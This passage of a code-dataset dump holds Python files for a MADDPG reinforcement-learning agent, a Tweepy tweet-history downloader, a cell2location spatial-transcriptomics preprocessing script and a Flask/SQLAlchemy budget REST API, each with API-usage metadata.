"eduid_webapp.group_management.settings.common.GroupManagementConfig", "line_number": 56, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 56, "usage_type": "call"}, {"api_name": "eduid_common.config.exceptions.BadConfiguration", "line_number": 60, "usage_type": "call"}, {"api_name": "eduid_userdb.group_management.GroupManagementInviteStateDB", "line_number": 61, "usage_type": "call"}, {"api_name": "eduid_scimapi.userdb.ScimApiUserDB", "line_number": 65, "usage_type": "call"}, {"api_name": "eduid_scimapi.groupdb.ScimApiGroupDB", "line_number": 66, "usage_type": "call"}, {"api_name": "eduid_common.api.mail_relay.init_relay", "line_number": 75, "usage_type": "call"}, {"api_name": "eduid_common.api.mail_relay", "line_number": 75, "usage_type": "name"}, {"api_name": "eduid_common.api.translation.init_babel", "line_number": 78, "usage_type": "call"}, {"api_name": "eduid_common.api.translation", "line_number": 78, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 81, "usage_type": "call"}, {"api_name": "flask.current_app", "line_number": 81, "usage_type": "argument"}, {"api_name": "typing.Dict", "line_number": 84, "usage_type": "name"}, {"api_name": "eduid_webapp.group_management.views.group.group_management_views", "line_number": 98, "usage_type": "argument"}, {"api_name": "eduid_webapp.group_management.views.invite.group_invite_views", "line_number": 99, "usage_type": "argument"}]}
+{"seq_id": "534435687", "text": "# main code that contains the neural network setup\n# policy + critic updates\n# see ddpg.py for other details in the network\n\nfrom ddpg import DDPGAgent\nimport torch\nfrom utilities import soft_update, transpose_to_tensor, transpose_list\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n#device = 'cpu'\nimport numpy as np\nimport pdb\n\nDISCOUNT_FACTOR = 0.95 \nTAU = 0.02\n\ndef reshape_sample(vec3):\n ns, nm, ni = vec3.shape\n return vec3.reshape(nm, ns, ni)\n\ndef transpose_to_tensor(input_list):\n make_tensor = lambda x: torch.tensor(x, device = device, dtype=torch.float)\n return list(map(make_tensor, zip(*input_list)))\n\nclass MADDPG:\n #def __init__(self, agents_archs):\n def __init__(self, state_size, obs_size, action_size, num_agents):\n super(MADDPG, self).__init__()\n\n #self.maddpg_agent = [DDPGAgent(14, 16, 8, 2, \n #20, 32, 16), \n #DDPGAgent(14, 16, 8, 2, \n #20, 32, 16)]\n #self.maddpg_agent = [DDPGAgent(in_actor=x[\"in_actor\"], hidden_in_actor=x[\"hidden_in_actor\"], \n #hidden_out_actor=x[\"hidden_out_actor\"], out_actor=x[\"out_actor\"],\n #in_critic=x[\"in_critic\"], hidden_in_critic=x[\"hidden_in_critic\"], \n #hidden_out_critic=x[\"hidden_out_critic\"], \n #lr_actor=x[\"lr_actor\"], lr_critic=x[\"lr_critic\"]) for x in agents_archs]\n \n self.maddpg_agent = [DDPGAgent(state_size, obs_size, action_size, num_agents) for x in range(num_agents)]\n \n self.discount_factor = DISCOUNT_FACTOR\n self.tau = TAU\n self.iter = 0\n\n def get_actors(self):\n \"\"\"get actors of all the agents in the MADDPG object\"\"\"\n actors = [ddpg_agent.actor for ddpg_agent in self.maddpg_agent]\n return actors\n def get_critics(self):\n \"\"\"get actors of all the agents in the MADDPG object\"\"\"\n actors = [ddpg_agent.critic for ddpg_agent in self.maddpg_agent]\n return actors\n\n def get_target_actors(self):\n \"\"\"get target_actors of all the agents in the MADDPG object\"\"\"\n target_actors = [ddpg_agent.target_actor for ddpg_agent in self.maddpg_agent]\n return target_actors\n\n def act(self, obs_all_agents, noise=0.0):\n \"\"\"get actions from all agents in the MADDPG object\"\"\"\n actions = [agent.act(obs, noise) for agent, obs in zip(self.maddpg_agent, obs_all_agents)]\n return actions\n\n def target_act(self, obs_all_agents, noise=0.0):\n \"\"\"get target network actions from all the agents in the MADDPG object \"\"\"\n target_actions = [ddpg_agent.target_act(obs, noise) for ddpg_agent, obs in zip(self.maddpg_agent, obs_all_agents)]\n return target_actions\n \n\n #def update(self, samples, agent_number, logger):\n def update(self, samples, agent_number):\n \"\"\"update the critics and actors of all the agents \"\"\"\n\n # need to transpose each element of the samples\n # to flip obs[parallel_agent][agent_number] to\n # obs[agent_number][parallel_agent]\n obs, obs_full, action, reward, next_obs, next_obs_full, done = map(transpose_to_tensor, samples)\n #obs, obs_full, action, reward, next_obs, next_obs_full, done = samples\n #obs, action, reward, next_obs, done = map(transpose_to_tensor, [obs, action, reward, next_obs, done])\n #obs_full = torch.from_numpy( obs_full ).float().to(device)\n #next_obs_full = torch.from_numpy( next_obs_full ).float().to(device)\n\n obs_full = torch.stack(obs_full)\n next_obs_full = torch.stack(next_obs_full)\n \n agent = self.maddpg_agent[agent_number]\n agent.critic_optimizer.zero_grad()\n\n #critic loss = batch mean of (y- Q(s,a) from target network)^2\n #y = reward of this timestep + discount * Q(st+1,at+1) from target network\n target_actions = self.target_act(next_obs)\n #pdb.set_trace() #########################################################################################\n target_actions = torch.cat(target_actions, dim=1)\n #pdb.set_trace() #########################################################################################\n \n #target_critic_input = torch.cat((next_obs_full.t(),target_actions), dim=1).to(device)\n \n with torch.no_grad():\n #q_next = agent.target_critic(target_critic_input)\n q_next = agent.target_critic(next_obs_full.t(), target_actions)\n \n y = reward[agent_number].view(-1, 1) + self.discount_factor * q_next * (1 - done[agent_number].view(-1, 1))\n action = torch.cat(action, dim=1)\n #critic_input = torch.cat((obs_full.t(), action), dim=1).to(device)\n #q = agent.critic(critic_input)\n q = agent.critic(obs_full.t(), action)\n\n huber_loss = torch.nn.SmoothL1Loss()\n critic_loss = huber_loss(q, y.detach())\n critic_loss.backward()\n #torch.nn.utils.clip_grad_norm_(agent.critic.parameters(), 0.5)\n agent.critic_optimizer.step()\n\n #update actor network using policy gradient\n agent.actor_optimizer.zero_grad()\n # make input to agent\n # detach the other agents to save computation\n # saves some time for computing derivative\n q_input = [ self.maddpg_agent[i].actor(ob) if i == agent_number \\\n else self.maddpg_agent[i].actor(ob).detach()\n for i, ob in enumerate(obs) ]\n \n q_input = torch.cat(q_input, dim=1)\n # combine all the actions and observations for input to critic\n # many of the obs are redundant, and obs[1] contains all useful information already\n #q_input2 = torch.cat((obs_full.t(), q_input), dim=1)\n \n # get the policy gradient\n #actor_loss = -agent.critic(q_input2).mean()\n actor_loss = -agent.critic(obs_full.t(), q_input).mean()\n actor_loss.backward()\n #torch.nn.utils.clip_grad_norm_(agent.actor.parameters(),0.5)\n agent.actor_optimizer.step()\n\n\n def update_targets(self):\n \"\"\"soft update targets\"\"\"\n self.iter += 1\n for ddpg_agent in self.maddpg_agent:\n soft_update(ddpg_agent.target_actor, ddpg_agent.actor, self.tau)\n soft_update(ddpg_agent.target_critic, ddpg_agent.critic, self.tau)\n \n \n \n\n\n\n\n", "sub_path": "maddpg.py", "file_name": "maddpg.py", "file_ext": "py", "file_size_in_byte": 6521, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "torch.device", "line_number": 8, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 8, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 8, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 21, "usage_type": "attribute"}, {"api_name": "ddpg.DDPGAgent", "line_number": 39, "usage_type": "call"}, {"api_name": "utilities.transpose_to_tensor", "line_number": 77, "usage_type": "argument"}, {"api_name": "torch.stack", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.nn.SmoothL1Loss", "line_number": 108, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 108, "usage_type": "attribute"}, {"api_name": "torch.cat", "line_number": 123, "usage_type": "call"}, {"api_name": "utilities.soft_update", "line_number": 140, "usage_type": "call"}, {"api_name": "utilities.soft_update", "line_number": 141, "usage_type": "call"}]}
+{"seq_id": "638152831", "text": "#!/usr/bin/env python\n# encoding: utf-8\n# This code has been adapted from https://gist.github.com/yanofsky/5436496\n\nimport sys\nimport tweepy # https://github.com/tweepy/tweepy\nimport csv\nimport api_keys\nimport xlsxwriter\nimport tweet_cleaner\n\n\ndef get_all_tweets(screen_name):\n # Twitter only allows access to a users most recent 3240 tweets with this method\n\n # authorize twitter, initialize tweepy\n if api_keys.consumer_key == '' or api_keys.consumer_secret == '' \\\n or api_keys.access_token == '' or api_keys.access_secret == '':\n print(\"API key not found. Please check api_keys.py file\")\n sys.exit(-1)\n auth = tweepy.OAuthHandler(api_keys.consumer_key, api_keys.consumer_secret)\n auth.set_access_token(api_keys.access_token, api_keys.access_secret)\n api = tweepy.API(auth)\n\n # initialize a list to hold all the tweepy Tweets\n alltweets = []\n\n # make initial request for most recent tweets (200 is the maximum allowed count)\n new_tweets = api.user_timeline(screen_name=screen_name, count=200)\n\n # save most recent tweets\n alltweets.extend(new_tweets)\n\n # save the id of the oldest tweet less one\n oldest = alltweets[-1].id - 1\n\n # keep grabbing tweets until there are no tweets left to grab\n while len(new_tweets) > 0:\n print(\"getting tweets before {}\".format(oldest))\n\n # all subsiquent requests use the max_id param to prevent duplicates\n new_tweets = api.user_timeline(screen_name=screen_name, count=200, max_id=oldest)\n\n # save most recent tweets\n alltweets.extend(new_tweets)\n\n # update the id of the oldest tweet less one\n oldest = alltweets[-1].id - 1\n\n print(\"...{} tweets downloaded so far\".format((len(alltweets))))\n #print('all tweets\\n', alltweets)\n #print('first tweet:', alltweets[0])\n # transform the tweepy tweets into a 2D array that will populate the csv\n outtweets = [[tweet.id_str, tweet.created_at.strftime('%m/%d/%Y'), tweet.text.encode(\"utf-8\").decode('utf-8')] for tweet in alltweets]\n outtweetsDict = [{'id': tweet.id_str, 'created_at': tweet.created_at.strftime('%m/%d/%Y'), 'text': tweet.text.encode(\"utf-8\").decode('utf-8')} for\n tweet in alltweets]\n #print('first outtweets:', outtweets[0])\n\n # write the csv\n with open('%s_tweets.csv' % screen_name, 'w') as csvfile:\n fieldnames = [\"id\", \"created_at\", \"text\"]\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames, dialect='excel')\n writer.writeheader()\n writer.writerows(outtweetsDict)\n\n workbook = xlsxwriter.Workbook('%s_tweets.xlsx' % screen_name)\n worksheet = workbook.add_worksheet()\n # Start from the first cell. Rows and columns are zero indexed.\n row = 0\n col = 0\n worksheet.write(row, 0, 'id')\n worksheet.write(row, 1, 'created_at')\n worksheet.write(row, 2, 'original_text')\n worksheet.write(row, 3, 'clean_text')\n row += 1\n for tid, tdate, text in outtweets:\n clean_text = tweet_cleaner.clean_tweet(text)\n clean_text = tweet_cleaner.normalize_arabic(clean_text)\n clean_text = tweet_cleaner.remove_repeating_char(clean_text)\n clean_text = tweet_cleaner.keep_only_arabic(clean_text.split())\n worksheet.write(row, col, tid)\n worksheet.write(row, col + 1, tdate)\n worksheet.write(row, col + 2, text)\n worksheet.write(row, col + 3, clean_text)\n row += 1\n workbook.close()\n\nif __name__ == '__main__':\n # pass in the username of the account you want to download\n get_all_tweets(\"Motaz_K_Saad\")\n", "sub_path": "user_tweets_history.py", "file_name": "user_tweets_history.py", "file_ext": "py", "file_size_in_byte": 3583, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "api_keys.consumer_key", "line_number": 17, "usage_type": "attribute"}, {"api_name": "api_keys.consumer_secret", "line_number": 17, "usage_type": "attribute"}, {"api_name": "api_keys.access_token", "line_number": 18, "usage_type": "attribute"}, {"api_name": "api_keys.access_secret", "line_number": 18, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 20, "usage_type": "call"}, {"api_name": "tweepy.OAuthHandler", "line_number": 21, "usage_type": "call"}, {"api_name": "api_keys.consumer_key", "line_number": 21, "usage_type": "attribute"}, {"api_name": "api_keys.consumer_secret", "line_number": 21, "usage_type": "attribute"}, {"api_name": "api_keys.access_token", "line_number": 22, "usage_type": "attribute"}, {"api_name": "api_keys.access_secret", "line_number": 22, "usage_type": "attribute"}, {"api_name": "tweepy.API", "line_number": 23, "usage_type": "call"}, {"api_name": "csv.DictWriter", "line_number": 62, "usage_type": "call"}, {"api_name": "xlsxwriter.Workbook", "line_number": 66, "usage_type": "call"}, {"api_name": "tweet_cleaner.clean_tweet", "line_number": 77, "usage_type": "call"}, {"api_name": "tweet_cleaner.normalize_arabic", "line_number": 78, "usage_type": "call"}, {"api_name": "tweet_cleaner.remove_repeating_char", "line_number": 79, "usage_type": "call"}, {"api_name": "tweet_cleaner.keep_only_arabic", "line_number": 80, "usage_type": "call"}]}
+{"seq_id": "225918836", "text": "import sys\nimport os\n\nimport scanpy as sc\nimport anndata\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\n\nimport cell2location\nfrom cell2location.utils.filtering import filter_genes\n\nfrom matplotlib import rcParams\nrcParams['pdf.fonttype'] = 42 # enables correct plotting of text\nimport seaborn as sns\n\nimport pyhere\nfrom pathlib import Path\nfrom PIL import Image\nimport json\n\n################################################################################\n# Variable definitions\n################################################################################\n\ncell_group = \"layer\" # \"broad\" or \"layer\"\n\n\nsc_path = pyhere.here(\n \"processed-data\", \"spot_deconvo\", \"05-shared_utilities\",\n \"sce_\" + cell_group + \".h5ad\"\n)\nsp_path = pyhere.here(\n \"processed-data\", \"spot_deconvo\", \"05-shared_utilities\", \"nonIF\", \"spe.h5ad\"\n)\n\nprocessed_dir = pyhere.here(\n \"processed-data\", \"spot_deconvo\", \"03-cell2location\", \"nonIF\", cell_group\n)\nplot_dir = pyhere.here(\n \"plots\", \"spot_deconvo\", \"03-cell2location\", \"nonIF\", cell_group\n)\nPath(plot_dir).mkdir(parents=True, exist_ok=True)\nPath(processed_dir).mkdir(parents=True, exist_ok=True)\n\n# Directory containing hires image and a JSON containing scale factors and\n# spot size for a given sample. Here '{}' will be replaced by a single\n# sample name\nspaceranger_dir = pyhere.here(\n 'processed-data', 'rerun_spaceranger', '{}', 'outs', 'spatial'\n)\n\nmarker_path = pyhere.here(\n \"processed-data\", \"spot_deconvo\", \"05-shared_utilities\",\n \"markers_\" + cell_group + \".txt\"\n)\n\nsample_info_path = pyhere.here(\n \"processed-data\", \"spot_deconvo\", \"nonIF_ID_table.csv\"\n)\n\n# In single-cell only\nif cell_group == 'broad':\n cell_type_var = 'cellType_broad_hc'\nelse:\n cell_type_var = 'layer_level'\n\n# Naming conventions used for different columns in the spatial AnnData\nsample_id_var = 'sample_id' # in spatial object only\nensembl_id_var = 'gene_id' # in both spatial and single-cell objects\ngene_symbol_var = 'gene_name' # in both spatial and single-cell objects\nspatial_coords_names = ['pxl_col_in_fullres', 'pxl_row_in_fullres']\n\nplot_file_type = 'pdf'\n\n################################################################################\n# Preprocessing\n################################################################################\n\n# Load AnnDatas\nprint('Loading AnnDatas...')\nadata_vis = sc.read_h5ad(sp_path)\nadata_ref = sc.read_h5ad(sc_path)\n\nadata_vis.obs['sample'] = adata_vis.obs[sample_id_var]\n\n# Different naming conventions are used between sample IDs in adata_vis vs. in\n# file paths for spaceranger files. Compute the corresponding spaceranger IDs\nsample_info = pd.read_csv(sample_info_path)\n\n# rename genes to ENSEMBL\nadata_vis.var['SYMBOL'] = adata_vis.var[gene_symbol_var]\nadata_vis.var_names = adata_vis.var[ensembl_id_var]\nadata_vis.var_names.name = None\n\n# find mitochondria-encoded (MT) genes\nadata_vis.var['MT_gene'] = [\n gene.startswith('MT-') for gene in adata_vis.var['SYMBOL']\n]\n\n# remove MT genes for spatial mapping (keeping their counts in the object).\nadata_vis.obsm['MT'] = adata_vis[:, adata_vis.var['MT_gene'].values].X.toarray()\nadata_vis = adata_vis[:, ~adata_vis.var['MT_gene'].values]\n\n# Spatial AnnData needs unique indices. Rather than using barcode (repeated\n# for every sample), use \"key\" (barcode + sample ID)\nadata_vis.obs_names = adata_vis.obs['key']\nadata_vis.obs_names.name = None\n\n# Use ENSEMBL as gene IDs to make sure IDs are unique and correctly matched\nadata_ref.var['SYMBOL'] = adata_ref.var[gene_symbol_var]\nadata_ref.var.index = adata_ref.var[ensembl_id_var]\nadata_ref.var_names = adata_ref.var[ensembl_id_var]\nadata_ref.var.index.name = None\n\n# Subset to marker genes\nwith open(marker_path, 'r') as f:\n selected = f.read().splitlines()\n\nadata_ref = adata_ref[:, selected].copy()\n\n#-------------------------------------------------------------------------------\n# Attach hi-res images and scaleFactors to spatial AnnData\n#-------------------------------------------------------------------------------\n\nadata_vis.uns['spatial'] = {}\n\nfor sample_id in adata_vis.obs['sample'].cat.categories:\n spaceranger_id = sample_info[\n sample_info['short_id'] == sample_id\n ]['long_id'].values[0]\n \n # Path to JSON from spaceranger including spot size for this sample\n json_path = pyhere.here(\n str(spaceranger_dir).format(spaceranger_id), 'scalefactors_json.json'\n )\n \n with open(json_path) as f: \n json_data = json.load(f)\n \n # Read in high-res image as numpy array with values in [0, 1] rather than\n # [0, 255], then attach to AnnData object\n img_path = str(\n pyhere.here(\n str(spaceranger_dir).format(spaceranger_id),\n 'tissue_hires_image.png'\n )\n )\n img_arr = np.array(Image.open(img_path), dtype = np.float32) / 256\n \n # Store image and scalefactors in AnnData as squidpy expects\n adata_vis.uns['spatial'][sample_id] = {\n 'scalefactors': json_data,\n 'images' : { 'hires' : img_arr }\n }\n\n#-------------------------------------------------------------------------------\n# Attach spatialCoords to spatial AnnData\n#-------------------------------------------------------------------------------\n\n# Correct how spatialCoords are stored. Currently, they are a pandas\n# DataFrame, with the columns potentially in the wrong order (depending on the\n# version of SpatialExperiment used in R). We need them as a numpy array.\nadata_vis.obsm['spatial'] = np.array(\n adata_vis.obsm['spatial'][spatial_coords_names]\n)\n\n#-------------------------------------------------------------------------------\n# Replace special characters in some layer groups\n#-------------------------------------------------------------------------------\n\nif cell_group == \"layer\":\n adata_ref.obs[cell_type_var] = pd.Series(\n [x.replace('/', '_') for x in adata_ref.obs[cell_type_var]],\n dtype = 'category', index = adata_ref.obs_names\n )\n\n#-------------------------------------------------------------------------------\n# Save AnnDatas\n#-------------------------------------------------------------------------------\n\nif cell_group == 'broad':\n adata_vis.write_h5ad(\n os.path.join(os.path.dirname(processed_dir), 'adata_vis_orig.h5ad')\n )\n\nadata_ref.write_h5ad(\n os.path.join(processed_dir, 'adata_ref_orig.h5ad')\n)\n", "sub_path": "code/spot_deconvo/03-cell2location/01-prepare_anndata_nonIF.py", "file_name": "01-prepare_anndata_nonIF.py", "file_ext": "py", "file_size_in_byte": 6474, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "matplotlib.rcParams", "line_number": 15, "usage_type": "name"}, {"api_name": "pyhere.here", "line_number": 30, "usage_type": "call"}, {"api_name": "pyhere.here", "line_number": 34, "usage_type": "call"}, {"api_name": "pyhere.here", "line_number": 38, "usage_type": "call"}, {"api_name": "pyhere.here", "line_number": 41, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 44, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 45, "usage_type": "call"}, {"api_name": "pyhere.here", "line_number": 50, "usage_type": "call"}, {"api_name": "pyhere.here", "line_number": 54, "usage_type": "call"}, {"api_name": "pyhere.here", "line_number": 59, "usage_type": "call"}, {"api_name": "scanpy.read_h5ad", "line_number": 83, "usage_type": "call"}, {"api_name": "scanpy.read_h5ad", "line_number": 84, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 90, "usage_type": "call"}, {"api_name": "pyhere.here", "line_number": 135, "usage_type": "call"}, {"api_name": "json.load", "line_number": 140, "usage_type": "call"}, {"api_name": "pyhere.here", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 150, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 150, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 150, "usage_type": "name"}, {"api_name": "numpy.float32", "line_number": 150, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 165, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 174, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 185, "usage_type": "call"}, {"api_name": "os.path", "line_number": 185, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 185, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 189, "usage_type": "call"}, {"api_name": "os.path", "line_number": 189, "usage_type": "attribute"}]}
+{"seq_id": "261898025", "text": "from flask import Flask, session, redirect, url_for, escape, request, render_template, flash\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy import and_\nfrom sqlalchemy import func\nfrom sqlalchemy import exc\nimport json\n\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///budget.db'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\n\napp.secret_key = \"this is a terrible secret key\"\n\n\n##########################################\n####////MODELS----MODELS----MODELS\\\\\\\\####\n##########################################\n\nclass Category(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(30), nullable=False, unique=True)\n limit = db.Column(db.Integer, nullable=False)\n\n def __init__(self, name, limit):\n self.name = name\n self.limit = limit\n\n def __repr__(self):\n return '' % (self.id, self.name, self.limit)\n\n def as_dict(self):\n return {\n \"id\": self.id,\n \"name\": self.name,\n \"limit\": self.limit\n }\n\n\nclass Purchase(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n cat_id = db.Column(db.Integer, db.ForeignKey('category.id'), nullable=False)\n name = db.Column(db.String(30), nullable=False)\n cost = db.Column(db.Integer, nullable=False)\n date = db.Column(db.String(10), nullable=False)\n\n def __init__(self, cat_id, name, cost, date):\n self.cat_id = cat_id\n self.name = name\n self.cost = cost\n self.date = date\n\n def __repr__(self):\n return '' % (self.id, self.cat_id, self.name, self.cost, self.date)\n\n def as_dict(self):\n return {\n \"id\": self.id,\n \"cat_id\": self.cat_id,\n \"name\": self.name,\n \"cost\": self.cost,\n \"date\": self.date\n }\n\n#########################################################\n####////CONTROLLERS----CONTROLLERS----CONTROLLERS\\\\\\\\####\n#########################################################\n\n@app.cli.command('initdb')\ndef initdb_command():\n db.drop_all()\n db.create_all()\n\n default_cat = Category('rentUtils', 0)\n db.session.add(default_cat)\n db.session.commit()\n\n print('Initialized database.')\n\n\n###################################################\n####////FUNCTIONS----FUNCTIONS----FUNCTIONS\\\\\\\\####\n###################################################\n\ndef add_category(new_cat_name, limit):\n cat_exists = Category.query.filter_by(name=new_cat_name).first()\n if not cat_exists:\n try:\n new_cat = Category(new_cat_name, limit)\n db.session.add(new_cat)\n db.session.commit()\n return True\n except exc.SQLAlchemyError:\n pass\n\n return False\n\n\ndef remove_category(selected_cat):\n cat_exists = Category.query.filter_by(name=selected_cat).first()\n if cat_exists:\n cats_p = Purchase.query.filter_by(cat_id=cat_exists.id).all()\n if cats_p:\n try:\n for p in cats_p:\n db.session.delete(p)\n except exc.SQLAlchemyError:\n pass\n try:\n db.session.delete(cat_exists)\n db.session.commit()\n return True\n except exc.SQLAlchemyError:\n pass\n\n return False\n\n\ndef get_category(selected_cat_name):\n cat_exists = Category.query.filter_by(name=selected_cat_name).first().as_dict()\n if cat_exists:\n s = db.session.query(func.sum(Purchase.cost)).filter(Purchase.cat_id == cat_exists['id']).scalar()\n if s is None:\n s = 0\n pts = db.session.query(func.sum(Category.limit)).scalar()\n\n if selected_cat_name != 'rentUtils':\n return {\n 'name': cat_exists['name'],\n 'cost': s,\n 'limit': cat_exists['limit'],\n 'purchases': get_purchases_by_cat(selected_cat_name),\n 'percent_total_spending': int(round((cat_exists['limit']/pts)*100, 0))\n }\n else:\n return {\n 'name': cat_exists['name'],\n 'cost': s,\n 'limit': cat_exists['limit'],\n 'purchases': get_purchases_by_cat(selected_cat_name)\n }\n\n return {}\n\n\ndef get_all_categories():\n try:\n raw_info = [x.as_dict() for x in Category.query.all()]\n for item in raw_info:\n s = db.session.query(func.sum(Purchase.cost)).filter(Purchase.cat_id == item['id']).scalar()\n if s is None:\n s = 0\n item['cost'] = s\n return raw_info\n except exc.SQLAlchemyError:\n return {}\n\ndef add_purchase(name, category, cost, date):\n cat_id = Category.query.filter_by(name=category).first().id\n if cat_id:\n try:\n p = Purchase(cat_id, name, cost, date)\n db.session.add(p)\n db.session.commit()\n return True\n except exc.SQLAlchemyError:\n pass\n\n return False\n\n\ndef remove_purchase(p_id):\n p = Purchase.query.filter_by(id=p_id).first()\n if p:\n try:\n db.session.delete(p)\n db.session.commit()\n return True\n except exc.SQLAlchemyError:\n pass\n\n return False\n\n\ndef remove_purchases(cat, p_list):\n cat_id = Category.query.filter_by(name=cat).first().id\n for x in p_list:\n try:\n temp = Purchase.query.filter(and_(Purchase.cat_id == cat_id, Purchase.name == x)).first()\n db.session.delete(temp)\n except exc.SQLAlchemyError:\n return False\n\n db.session.commit()\n return True\n\n\ndef get_all_purchases():\n try:\n return [x.as_dict() for x in Purchase.query.all()]\n except exc.SQLAlchemyError:\n return {}\n\n\ndef get_purchase_by_id(cat_id):\n try:\n return [x.as_dict() for x in Purchase.query.filter_by(id=cat_id).all()]\n except exc.SQLAlchemyError:\n return {}\n\n\ndef get_purchases_by_cat(cat_name):\n try:\n cat_id = Category.query.filter_by(name=cat_name).first().id\n return [x.as_dict() for x in Purchase.query.filter_by(cat_id=cat_id).all()]\n except exc.SQLAlchemyError:\n return {}\n\n###################################################\n####////APPROUTES----APPROUTES----APPROUTES\\\\\\\\####\n###################################################\n\n\n@app.route(\"/\")\ndef skeleton():\n return render_template('skeleton.html')\n\n\n@app.route(\"/cats\", methods=[\"GET\", \"DELETE\", \"POST\"])\ndef cats():\n if request.method == 'GET':\n if 'cat' in request.args:\n return json.dumps({\n 'category': get_category(request.args['cat'])\n })\n elif 'cat_page' in request.args:\n return render_template('purchaseList.html', info=get_category(request.args['cat_page']))\n else:\n return json.dumps({\n 'categories': get_all_categories()\n })\n elif request.method == 'DELETE' and 'cat' in request.args:\n return json.dumps({\n 'completed': remove_category(request.args.get('cat'))\n })\n elif request.method == 'POST' and 'new_cat_name' in request.json and 'new_cat_limit' in request.json:\n return json.dumps({\n 'completed': add_category(request.json['new_cat_name'], request.json['new_cat_limit'])\n })\n\n\n@app.route(\"/purchases\", methods=[\"GET\", \"DELETE\", \"POST\"])\ndef purchases():\n\n if request.method == 'GET':\n if 'cat' in request.args:\n return json.dumps({\n 'purchases': get_purchases_by_cat(request.args.get('cat'))\n })\n elif 'id' in request.args:\n return json.dumps({\n 'purchase': get_purchase_by_id(request.args.get('id'))\n })\n else:\n return json.dumps({\n 'purchase': get_all_purchases()\n })\n elif request.method == 'DELETE' and 'id' in request.args:\n return json.dumps({\n 'completed': remove_purchase(request.args.get('id'))\n })\n elif request.method == 'DELETE' and 'cat' in request.json and 'names' in request.json:\n return json.dumps({\n 'completed': remove_purchases(request.json['cat'], request.json['names'])\n })\n elif request.method == 'POST' and 'name' in request.json and 'category' in request.json and \\\n 'cost' in request.json and 'date' in request.json:\n return json.dumps({\n 'completed': add_purchase(request.json['name'], request.json['category'],\n request.json['cost'], request.json['date'])\n })\n\n\nif __name__ == '__main__':\n app.run()\n", "sub_path": "Undergrad CS1520 Programming Languages for Web Applications/REST API/budget.py", "file_name": "budget.py", "file_ext": "py", "file_size_in_byte": 8738, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "flask.Flask", "line_number": 9, "usage_type": "call"}, {"api_name": "flask_sqlalchemy.SQLAlchemy", "line_number": 12, "usage_type": "call"}, {"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 94, "usage_type": "attribute"}, {"api_name": "sqlalchemy.exc", "line_number": 94, "usage_type": "name"}, {"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 108, "usage_type": "attribute"}, {"api_name": "sqlalchemy.exc", "line_number": 108, "usage_type": "name"}, {"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 114, "usage_type": "attribute"}, {"api_name": "sqlalchemy.exc", "line_number": 114, "usage_type": "name"}, {"api_name": "sqlalchemy.func.sum", "line_number": 123, "usage_type": "call"}, {"api_name": "sqlalchemy.func", "line_number": 123, "usage_type": "name"}, {"api_name": "sqlalchemy.func.sum", "line_number": 126, "usage_type": "call"}, {"api_name": "sqlalchemy.func", "line_number": 126, "usage_type": "name"}, {"api_name": "sqlalchemy.func.sum", "line_number": 151, "usage_type": "call"}, {"api_name": "sqlalchemy.func", "line_number": 151, "usage_type": "name"}, {"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 156, "usage_type": "attribute"}, {"api_name": "sqlalchemy.exc", "line_number": 156, "usage_type": "name"}, {"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 167, "usage_type": "attribute"}, {"api_name": "sqlalchemy.exc", "line_number": 167, "usage_type": "name"}, {"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 180, "usage_type": "attribute"}, {"api_name": "sqlalchemy.exc", "line_number": 180, "usage_type": "name"}, {"api_name": "sqlalchemy.and_", "line_number": 190, "usage_type": "call"}, {"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 192, "usage_type": "attribute"}, {"api_name": "sqlalchemy.exc", "line_number": 192, "usage_type": "name"}, {"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 202, "usage_type": "attribute"}, {"api_name": "sqlalchemy.exc", "line_number": 202, "usage_type": "name"}, {"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 209, "usage_type": "attribute"}, {"api_name": "sqlalchemy.exc", "line_number": 209, "usage_type": "name"}, 